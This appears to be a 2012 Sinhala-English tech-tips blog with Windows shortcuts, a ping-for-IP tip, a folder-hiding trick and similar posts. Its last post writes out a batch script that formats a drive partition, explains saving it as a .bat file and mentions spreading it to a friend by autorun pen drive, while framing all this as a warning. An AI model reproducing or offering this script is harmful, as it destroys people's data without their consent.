හැමදේම English වලින් කියවන්න එන්න මගේ අනිත් Site එකට, ගොඩාක් සතුටෙන් මම ආරාධනය කරනව මගේ යාලුවො හැමෝටම

Please come to my other web page to read in English and Sinhala each and every document, you are welcome my dear friends

Monday, April 30, 2012

Keyboard Shortcuts


CTRL+C (Copy)

CTRL+X (Cut)

CTRL+V (Paste)

CTRL+Z (Undo)

DELETE (Delete)

SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)

CTRL while dragging an item (Copy the selected item)

CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)

F2 key (Rename the selected item)

CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)

CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)

CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)

CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)

CTRL+SHIFT with any of the arrow keys (Highlight a block of text)

SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)

CTRL+A (Select all)

F3 key (Search for a file or a folder)

ALT+ENTER (View the properties for the selected item)

ALT+F4 (Close the active item, or quit the active program)

ALT+ENTER (Display the properties of the selected object)

ALT+SPACEBAR (Open the shortcut menu for the active window)

CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)

ALT+TAB (Switch between the open items)

ALT+ESC (Cycle through items in the order that they had been opened)

F6 key (Cycle through the screen elements in a window or on the desktop)

F4 key (Display the Address bar list in My Computer or Windows Explorer)

SHIFT+F10 (Display the shortcut menu for the selected item)

ALT+SPACEBAR (Display the System menu for the active window)

think and do it and try it

~~esh~~

ඔනෙම Web page එකක IP Address එක හොයන්න පුලුවන් ක්‍රමේ මෙන්න


ඔනෙම Web Site එකක IP Address එක හොයන්න පුලුවන් ක්‍රමයක් තමයි මේ
මෙහෙම කරන්න

Start --> All Programs --> Accessories --> Command Prompt

දැන් මෙහෙම type කරන්න,

PING (and web address here)

EX -: PING www.facebook.com

මෙන්න මට ආපු FB එකේ IP එක

69.171.229.16

මතක ඇතුව Internet connetion එක තියෙද්දි තමයි මේක මෙහෙම කරන්න ඔනේ
දැන් ඔයට IP Address එක ලැබෙයි, ඔයාට දැන් Web Address එක නැතුව මේක Type කරල Log වෙන්න පුලුවන්

think and do it and try it
~~esh~~

How to delete your facebook account


ගොඩක් අයට තියන ප්‍රශ්ණයක් තමයි තමන්ගේ FB Account එක ජිවිත කාලයටම Delete කරල දාන්නේ කොහොමද? කියල, ඉතින් මෙන්න මේ ලින්ක් එක click කරන්නකො, හැමදේම ඉවරයක් වේයි, මේක click උනත් ඇති, ඒක නිස පරිස්සමින් යාලුවනේ

මෙන්න තැන


think and do it and try it
~~esh~~

AM and PM වෙනුවට අපේම නම දා ගමුද?


මේකත් නියම වැඩක්, මෙහෙමයි මෙක කරන්නේ, මුලින්ම මේ විදිහට කරන්න


Start ---> Control Panel ---> region and language


දැන් මෙතන තියන Additinoal settings press කරන්න, ඊට පස්සේ මේ වගේ එකක් එයි


එතන TIME එක Select කරන්න, එතන AM symbol and PM symbol කියල දෙකක් ඇති එතනට ඔයගෙ නම දෙන්න, දිලා OK කරන්න, දැන් වැඩේ හරි

 think and do it and try it
~~esh~~

Folder අමුතුම ක්‍රමේකට හන්ගමු

මේක නියම ක්‍රමයක්, මෙහෙමයි, මුලින්ම File එක Rename කරන්න ඔනේ, ඒක කරද්දි මේ විදිහට කරන්න ALT+0160 දැන් නමක් නැතුව File එක ඇති මේ විදිහට

















දැන් මේක අපි සගවමුද? හේහේ, මෙකත් නියම ක්‍රමයක්, මේ විදිහට කරන්නකො දැන් Folder එක උඩ Right Click කරල Properties ගිහින් Customize අර ගන්න, එකෙ මේ පහල වගේ හිස් තැන Select කරලා OK කරන්න වැඩේ ගොඩ

















Think and do it and try it hehe
 ~~esh~~

Do you like to talk with AI


මේක පොඩි ෆන් වැඩක්, නිකන් කම්මැලි වෙලවක මෙකට ගිහින් බලන්නකො යලුවනේ, මේක නියම තැනක්, කෘතිම බුද්ඪියක් එක්ක තමඉ අපිට කත කරන්න තියෙන්නේ, ඔනෙම කෙනෙක්ට පුලුවන්, හැබයි කඩ්ඩ පොඩ්ඩක් ඔනේ, මමත් කරා, එත් අවසානේ චැට් එක මගදි තමයි දැන ගත්තෙ මෙයා Kanda වල කෙල්ලෙක්, ඔයලත් ගිහින්ම බලන්නකො හේහේ

මෙතන Click කරන්න
~~esh~~

මෙහෙම දේවල් තියනවා පරිස්සම් වෙන්න යාලුවනේ


මේක කියන්නෙ දෑන ගන්න ඔනෙ නිසා හැමොම,  මේක Partition එකක් ෆුල්ම ෆොර්මෑට් කරල දාන්න පුලුවන් වැඩක්,  මේක හොදටම වැඩනම් XP වලට, දන්නෙ නැති කෙනෙක්ගෙ උනත් Win7 වලට උනත් මෙහෙම කරල Hard එකෙ Partition එකක් ෆුල් Format එකක් දෙන්න පුලුවන්,  මේක දාන්නෙ ඔයලගෙ දෑනුමට, මෙහෙම දේවල්වලින් ආරක්ෂා වෙන්න, මුලින්ම Notepad එක Open කර ගන්න ඊට පස්සෙ මේක Copy ---> Paste කර ගන්න.

md Hacked_By_nimeshtech
Format L:
/ Y Enter

 nimeshtech කියන එක වෙනුවට ඔයාලගෙ නම එතනට දෙන්න පුලුවන් Format L කියන තෑනට C partition එක වෙනුවට කෑමති එකක් දෙන්න පුලුවන්,  මේක D එක එහෙම දාල බලන්නකො හේහේ, ඊට පස්සෙ  මේක Save කර ගන්න ඔනෙ Save as ගිහින් එතන කෑමති නමක් එකක් දීල අවසානේට .bat කියල දෙන්න, Save as type කියන තෑන All Files දෙන්න, ඊට පස්සෙ Save කරන්න, දෑන්  මේක Open කරන්න එහෙම එපා මචො, දාපු Partition එක Format වෙලාම යාවි, දැන්  මේකට පොඩි Auto Run File එකක් ලියල Pen එකකට වගෙ දාල යාලුවෙකුට දුන්නනම් මල කෙලියයි, එහෙම කරන්න එපා මොකද අපි කරන නරක වැඩ මේ ලොකෙ දෙවියො ස්වබාව ධර්මය බලන් ඉන්නව,  මේක ඔයලගෙ  ආරක්ෂාවට කියල දුන්නෙ, සමහර විට මේක ගොඩක් අය දන්නවත් ඇති, එත් නොදන්න අය  ආරක්ෂා වෙන්න ඔනේ,, එක නිසයි දෑම්මෙ, නරක වෑඩ කවදාවත් හොද නැ දැනුමටම විතරයි  මේක,

 think and do it and try it
 ~~esh~~